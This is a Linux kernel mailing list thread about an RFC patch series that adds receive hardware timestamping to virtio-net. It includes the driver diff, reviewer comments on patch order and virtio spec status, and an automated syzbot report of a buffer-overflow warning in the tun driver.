2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Add optional hardware rx timestamp offload for virtio-net.
Introduce virtio feature VIRTIO_NET_F_TSTAMP. If negotiated, the
virtio-net header is expanded with room for a timestamp.
To get and set the hwtstamp the functions ndo_hwtstamp_set/get need
to be implemented. This allows filtering the packets and only time stamp
the packets where the filter matches. This way, the timestamping can
be en/disabled at runtime.
Tested:
guest: ./timestamping eth0 \
SOF_TIMESTAMPING_RAW_HARDWARE \
SOF_TIMESTAMPING_RX_HARDWARE
host: nc -4 -u 192.168.1.1 319
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
--
Changes to last version:
- rework series to use flow filters
- add new struct virtio_net_hdr_v1_hash_tunnel_ts
- original work done by: Willem de Bruijn <willemb@google.com>
---
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
2 files changed, 133 insertions(+), 12 deletions(-)
diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
index 1bb3aeca66c6e..4e8d9b20c1b34 100644
--- a/drivers/net/virtio_net.c
+++ b/drivers/net/virtio_net.c
@@ -429,6 +429,9 @@ struct virtnet_info {
struct virtio_net_rss_config_trailer rss_trailer;
u8 rss_hash_key_data[VIRTIO_NET_RSS_MAX_KEY_SIZE];
+ /* Device passes time stamps from the driver */
+ bool has_tstamp;
+
/* Has control virtqueue */
bool has_cvq;
@@ -475,6 +478,8 @@ struct virtnet_info {
struct control_buf *ctrl;
+ struct kernel_hwtstamp_config tstamp_config;
+
/* Ethtool settings */
u8 duplex;
u32 speed;
@@ -511,6 +516,7 @@ struct virtio_net_common_hdr {
struct virtio_net_hdr_mrg_rxbuf mrg_hdr;
struct virtio_net_hdr_v1_hash hash_v1_hdr;
struct virtio_net_hdr_v1_hash_tunnel tnl_hdr;
+ struct virtio_net_hdr_v1_hash_tunnel_ts ts_hdr;
};
};
@@ -682,6 +688,13 @@ skb_vnet_common_hdr(struct sk_buff *skb)
return (struct virtio_net_common_hdr *)skb->cb;
}
+static inline struct virtio_net_hdr_v1_hash_tunnel_ts *skb_vnet_hdr_ts(struct sk_buff *skb)
+{
+ BUILD_BUG_ON(sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) > sizeof(skb->cb));
+
+ return (void *)skb->cb;
+}
+
/*
* private is used to chain pages for big packets, put the whole
* most recent used list in the beginning for reuse
@@ -2560,6 +2573,15 @@ virtio_net_hash_value(const struct virtio_net_hdr_v1_hash *hdr_hash)
(__le16_to_cpu(hdr_hash->hash_value_hi) << 16);
}
+static inline u64
+virtio_net_tstamp_value(const struct virtio_net_hdr_v1_hash_tunnel_ts *hdr_hash_ts)
+{
+ return (u64)__le16_to_cpu(hdr_hash_ts->tstamp_0) |
+ ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_1) << 16) |
+ ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_2) << 32) |
+ ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_3) << 48);
+}
+
static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash,
struct sk_buff *skb)
{
@@ -2589,6 +2611,18 @@ static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash,
skb_set_hash(skb, virtio_net_hash_value(hdr_hash), rss_hash_type);
}
+static inline void virtnet_record_rx_tstamp(const struct virtnet_info *vi,
+ struct sk_buff *skb)
+{
+ struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb);
+ const struct virtio_net_hdr_v1_hash_tunnel_ts *h = skb_vnet_hdr_ts(skb);
+ u64 ts;
+
+ ts = virtio_net_tstamp_value(h);
+ memset(shhwtstamps, 0, sizeof(struct skb_shared_hwtstamps));
+ shhwtstamps->hwtstamp = ns_to_ktime(ts);
+}
+
static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *rq,
struct sk_buff *skb, u8 flags)
{
@@ -2617,6 +2651,8 @@ static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *
goto frame_err;
}
+ if (vi->has_tstamp && vi->tstamp_config.rx_filter != HWTSTAMP_FILTER_NONE)
+ virtnet_record_rx_tstamp(vi, skb);
skb_record_rx_queue(skb, vq2rxq(rq->vq));
skb->protocol = eth_type_trans(skb, dev);
pr_debug("Receiving skb proto 0x%04x len %i type %i\n",
@@ -3321,7 +3357,7 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
{
const unsigned char *dest = ((struct ethhdr *)skb->data)->h_dest;
struct virtnet_info *vi = sq->vq->vdev->priv;
- struct virtio_net_hdr_v1_hash_tunnel *hdr;
+ struct virtio_net_hdr_v1_hash_tunnel_ts *hdr;
int num_sg;
unsigned hdr_len = vi->hdr_len;
bool can_push;
@@ -3329,8 +3365,8 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
pr_debug("%s: xmit %p %pM\n", vi->dev->name, skb, dest);
/* Make sure it's safe to cast between formats */
- BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr));
- BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr.hdr));
+ BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr));
+ BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr.hdr));
can_push = vi->any_header_sg &&
!((unsigned long)skb->data & (__alignof__(*hdr) - 1)) &&
@@ -3338,18 +3374,18 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
/* Even if we can, don't push here yet as this would skew
* csum_start offset below. */
if (can_push)
- hdr = (struct virtio_net_hdr_v1_hash_tunnel *)(skb->data -
- hdr_len);
+ hdr = (struct virtio_net_hdr_v1_hash_tunnel_ts *)(skb->data -
+ hdr_len);
else
- hdr = &skb_vnet_common_hdr(skb)->tnl_hdr;
+ hdr = &skb_vnet_common_hdr(skb)->ts_hdr;
- if (virtio_net_hdr_tnl_from_skb(skb, hdr, vi->tx_tnl,
+ if (virtio_net_hdr_tnl_from_skb(skb, &hdr->tnl, vi->tx_tnl,
virtio_is_little_endian(vi->vdev), 0,
false))
return -EPROTO;
if (vi->mergeable_rx_bufs)
- hdr->hash_hdr.hdr.num_buffers = 0;
+ hdr->tnl.hash_hdr.hdr.num_buffers = 0;
sg_init_table(sq->sg, skb_shinfo(skb)->nr_frags + (can_push ? 1 : 2));
if (can_push) {
@@ -5563,6 +5599,22 @@ static int virtnet_get_per_queue_coalesce(struct net_device *dev,
return 0;
}
+static int virtnet_get_ts_info(struct net_device *dev,
+ struct kernel_ethtool_ts_info *info)
+{
+ /* setup default software timestamp */
+ ethtool_op_get_ts_info(dev, info);
+
+ info->rx_filters = (BIT(HWTSTAMP_FILTER_NONE) |
+ BIT(HWTSTAMP_FILTER_PTP_V1_L4_SYNC) |
+ BIT(HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ) |
+ BIT(HWTSTAMP_FILTER_ALL));
+
+ info->tx_types = HWTSTAMP_TX_OFF;
+
+ return 0;
+}
+
static void virtnet_init_settings(struct net_device *dev)
{
struct virtnet_info *vi = netdev_priv(dev);
@@ -5658,7 +5710,7 @@ static const struct ethtool_ops virtnet_ethtool_ops = {
.get_ethtool_stats = virtnet_get_ethtool_stats,
.set_channels = virtnet_set_channels,
.get_channels = virtnet_get_channels,
- .get_ts_info = ethtool_op_get_ts_info,
+ .get_ts_info = virtnet_get_ts_info,
.get_link_ksettings = virtnet_get_link_ksettings,
.set_link_ksettings = virtnet_set_link_ksettings,
.set_coalesce = virtnet_set_coalesce,
@@ -6242,6 +6294,58 @@ static void virtnet_tx_timeout(struct net_device *dev, unsigned int txqueue)
jiffies_to_usecs(jiffies - READ_ONCE(txq->trans_start)));
}
+static int virtnet_hwtstamp_get(struct net_device *dev,
+ struct kernel_hwtstamp_config *tstamp_config)
+{
+ struct virtnet_info *vi = netdev_priv(dev);
+
+ if (!netif_running(dev))
+ return -EINVAL;
+
+ *tstamp_config = vi->tstamp_config;
+
+ return 0;
+}
+
+static int virtnet_hwtstamp_set(struct net_device *dev,
+ struct kernel_hwtstamp_config *tstamp_config,
+ struct netlink_ext_ack *extack)
+{
+ struct virtnet_info *vi = netdev_priv(dev);
+
+ if (!netif_running(dev))
+ return -EINVAL;
+
+ switch (tstamp_config->rx_filter) {
+ case HWTSTAMP_FILTER_PTP_V1_L4_SYNC:
+ case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ:
+ break;
+ case HWTSTAMP_FILTER_PTP_V2_EVENT:
+ case HWTSTAMP_FILTER_PTP_V2_L2_EVENT:
+ case HWTSTAMP_FILTER_PTP_V2_L4_EVENT:
+ case HWTSTAMP_FILTER_PTP_V2_SYNC:
+ case HWTSTAMP_FILTER_PTP_V2_L2_SYNC:
+ case HWTSTAMP_FILTER_PTP_V2_L4_SYNC:
+ case HWTSTAMP_FILTER_PTP_V2_DELAY_REQ:
+ case HWTSTAMP_FILTER_PTP_V2_L2_DELAY_REQ:
+ case HWTSTAMP_FILTER_PTP_V2_L4_DELAY_REQ:
+ tstamp_config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+ break;
+ case HWTSTAMP_FILTER_NONE:
+ break;
+ case HWTSTAMP_FILTER_ALL:
+ tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+ break;
+ default:
+ tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL;
+ return -ERANGE;
+ }
+
+ vi->tstamp_config = *tstamp_config;
+
+ return 0;
+}
+
static int virtnet_init_irq_moder(struct virtnet_info *vi)
{
u8 profile_flags = 0, coal_flags = 0;
@@ -6289,6 +6393,8 @@ static const struct net_device_ops virtnet_netdev = {
.ndo_get_phys_port_name = virtnet_get_phys_port_name,
.ndo_set_features = virtnet_set_features,
.ndo_tx_timeout = virtnet_tx_timeout,
+ .ndo_hwtstamp_set = virtnet_hwtstamp_set,
+ .ndo_hwtstamp_get = virtnet_hwtstamp_get,
};
static void virtnet_config_changed_work(struct work_struct *work)
@@ -6911,6 +7017,9 @@ static int virtnet_probe(struct virtio_device *vdev)
if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT))
vi->has_rss_hash_report = true;
+ if (virtio_has_feature(vdev, VIRTIO_NET_F_TSTAMP))
+ vi->has_tstamp = true;
+
if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) {
vi->has_rss = true;
@@ -6945,8 +7054,10 @@ static int virtnet_probe(struct virtio_device *vdev)
dev->xdp_metadata_ops = &virtnet_xdp_metadata_ops;
}
- if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
- virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
+ if (vi->has_tstamp)
+ vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts);
+ else if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) ||
+ virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO))
vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel);
else if (vi->has_rss_hash_report)
vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash);
@@ -7269,7 +7380,8 @@ static struct virtio_device_id id_table[] = {
VIRTIO_NET_F_SPEED_DUPLEX, VIRTIO_NET_F_STANDBY, \
VIRTIO_NET_F_RSS, VIRTIO_NET_F_HASH_REPORT, VIRTIO_NET_F_NOTF_COAL, \
VIRTIO_NET_F_VQ_NOTF_COAL, \
- VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS
+ VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS, \
+ VIRTIO_NET_F_TSTAMP
static unsigned int features[] = {
VIRTNET_FEATURES,
diff --git a/include/uapi/linux/virtio_net.h b/include/uapi/linux/virtio_net.h
index 1db45b01532b5..9f967575956b8 100644
--- a/include/uapi/linux/virtio_net.h
+++ b/include/uapi/linux/virtio_net.h
@@ -56,6 +56,7 @@
#define VIRTIO_NET_F_MQ 22 /* Device supports Receive Flow
* Steering */
#define VIRTIO_NET_F_CTRL_MAC_ADDR 23 /* Set MAC address */
+#define VIRTIO_NET_F_TSTAMP 49 /* Device sends TAI receive time */
#define VIRTIO_NET_F_DEVICE_STATS 50 /* Device can provide device-level statistics. */
#define VIRTIO_NET_F_VQ_NOTF_COAL 52 /* Device supports virtqueue notification coalescing */
#define VIRTIO_NET_F_NOTF_COAL 53 /* Device supports notifications coalescing */
@@ -215,6 +216,14 @@ struct virtio_net_hdr_v1_hash_tunnel {
__le16 inner_nh_offset;
};
+struct virtio_net_hdr_v1_hash_tunnel_ts {
+ struct virtio_net_hdr_v1_hash_tunnel tnl;
+ __le16 tstamp_0;
+ __le16 tstamp_1;
+ __le16 tstamp_2;
+ __le16 tstamp_3;
+};
+
#ifndef VIRTIO_NET_NO_LEGACY
/* This header comes first in the scatter-gather list.
* For legacy virtio, if VIRTIO_F_ANY_LAYOUT is not negotiated, it must
--
2.52.0
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Thu, 29 Jan 2026 09:06:42 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
On Thu, 29 Jan 2026 09:06:42 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote:
Since patch #1 used this struct, this one should be placed first in the series.
Also, has the virtio specification process accepted such a draft proposal?
Thanks
|
{
"author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>",
"date": "Thu, 29 Jan 2026 17:48:25 +0800",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Hi,
On 2026-01-29 at 17:48 +08, Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote:
oh, you are right, the order should be the other way around.
I haven't sent the draft yet, because I'm unsure if I understood the way this should be implemented with the flow filter correctly.
If the direction is correct, I'd try and get the specification process going again.
(That is not that easy, if you're not used to it and not that deep into the whole virtio universe ;))
Best regards,
Steffen
--
Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar |
Steuerwalder Str. 21 | https://www.pengutronix.de/ |
31137 Hildesheim, Germany | Phone: +49-5121-206917-0 |
Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Thu, 29 Jan 2026 11:08:27 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
On Thu, 29 Jan 2026 11:08:27 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote:
There have been many historical attempts in this area- you may want to take a
look first.
Thanks.
|
{
"author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>",
"date": "Thu, 29 Jan 2026 19:03:15 +0800",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
syzbot ci has tested the following series
[v2] virtio-net: add flow filter for receive timestamps
https://lore.kernel.org/all/20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de
* [PATCH RFC v2 1/2] tun: support rx-tstamp
* [PATCH RFC v2 2/2] virtio-net: support receive timestamp
and found the following issue:
WARNING in __copy_overflow
Full report is available here:
https://ci.syzbot.org/series/0b35c8c9-603b-4126-ac04-0095faadb2f5
***
WARNING in __copy_overflow
tree: net-next
URL: https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git
base: ffeafa65b2b26df2f5b5a6118d3174f17bd12ec5
arch: amd64
compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
config: https://ci.syzbot.org/builds/d8316da2-2688-4d74-bbf4-e8412e24d106/config
C repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/c_repro
syz repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/syz_repro
------------[ cut here ]------------
Buffer overflow detected (32 < 1840)!
WARNING: mm/maccess.c:234 at __copy_overflow+0x17/0x30 mm/maccess.c:234, CPU#0: syz.0.17/5993
Modules linked in:
CPU: 0 UID: 0 PID: 5993 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__copy_overflow+0x1c/0x30 mm/maccess.c:234
Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 53 48 89 f3 89 fd e8 60 b1 c4 ff 48 8d 3d 39 25 d5 0d 89 ee 48 89 da <67> 48 0f b9 3a 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 90 90
RSP: 0018:ffffc90003b97888 EFLAGS: 00010293
RAX: ffffffff81fdcf50 RBX: 0000000000000730 RCX: ffff88810ccd9d40
RDX: 0000000000000730 RSI: 0000000000000020 RDI: ffffffff8fd2f490
RBP: 0000000000000020 R08: ffffffff8fcec777 R09: 1ffffffff1f9d8ee
R10: dffffc0000000000 R11: ffffffff81742230 R12: dffffc0000000000
R13: 0000000000000000 R14: 0000000000000730 R15: 1ffff92000772f30
FS: 00007f08c446a6c0(0000) GS:ffff88818e32d000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f08c4448ff8 CR3: 000000010cec2000 CR4: 00000000000006f0
Call Trace:
<TASK>
copy_overflow include/linux/ucopysize.h:41 [inline]
check_copy_size include/linux/ucopysize.h:50 [inline]
copy_to_iter include/linux/uio.h:219 [inline]
tun_put_user drivers/net/tun.c:2089 [inline]
tun_do_read+0x1f44/0x28a0 drivers/net/tun.c:2190
tun_chr_read_iter+0x13b/0x260 drivers/net/tun.c:2214
do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1
vfs_readv+0x288/0x840 fs/read_write.c:1018
do_readv+0x154/0x2e0 fs/read_write.c:1080
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f08c359acb9
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f08c446a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000013
RAX: ffffffffffffffda RBX: 00007f08c3815fa0 RCX: 00007f08c359acb9
RDX: 0000000000000002 RSI: 0000200000000080 RDI: 0000000000000003
RBP: 00007f08c3608bf7 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f08c3816038 R14: 00007f08c3815fa0 R15: 00007fff6491da78
</TASK>
----------------
Code disassembly (best guess):
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop
4: 90 nop
5: 90 nop
6: 90 nop
7: 90 nop
8: 90 nop
9: 90 nop
a: 90 nop
b: 90 nop
c: 90 nop
d: 90 nop
e: f3 0f 1e fa endbr64
12: 55 push %rbp
13: 53 push %rbx
14: 48 89 f3 mov %rsi,%rbx
17: 89 fd mov %edi,%ebp
19: e8 60 b1 c4 ff call 0xffc4b17e
1e: 48 8d 3d 39 25 d5 0d lea 0xdd52539(%rip),%rdi # 0xdd5255e
25: 89 ee mov %ebp,%esi
27: 48 89 da mov %rbx,%rdx
* 2a: 67 48 0f b9 3a ud1 (%edx),%rdi <-- trapping instruction
2f: 5b pop %rbx
30: 5d pop %rbp
31: c3 ret
32: cc int3
33: cc int3
34: cc int3
35: cc int3
36: cc int3
37: cc int3
38: cc int3
39: cc int3
3a: cc int3
3b: cc int3
3c: cc int3
3d: cc int3
3e: 90 nop
3f: 90 nop
***
If these findings have caused you to resend the series or submit a
separate fix, please add the following tag to your commit message:
Tested-by: syzbot@syzkaller.appspotmail.com
---
This report is generated by a bot. It may contain errors.
syzbot ci engineers can be reached at syzkaller@googlegroups.com.
|
{
"author": "syzbot ci <syzbot+ci99a227ab2089b0fa@syzkaller.appspotmail.com>",
"date": "Thu, 29 Jan 2026 05:27:03 -0800",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
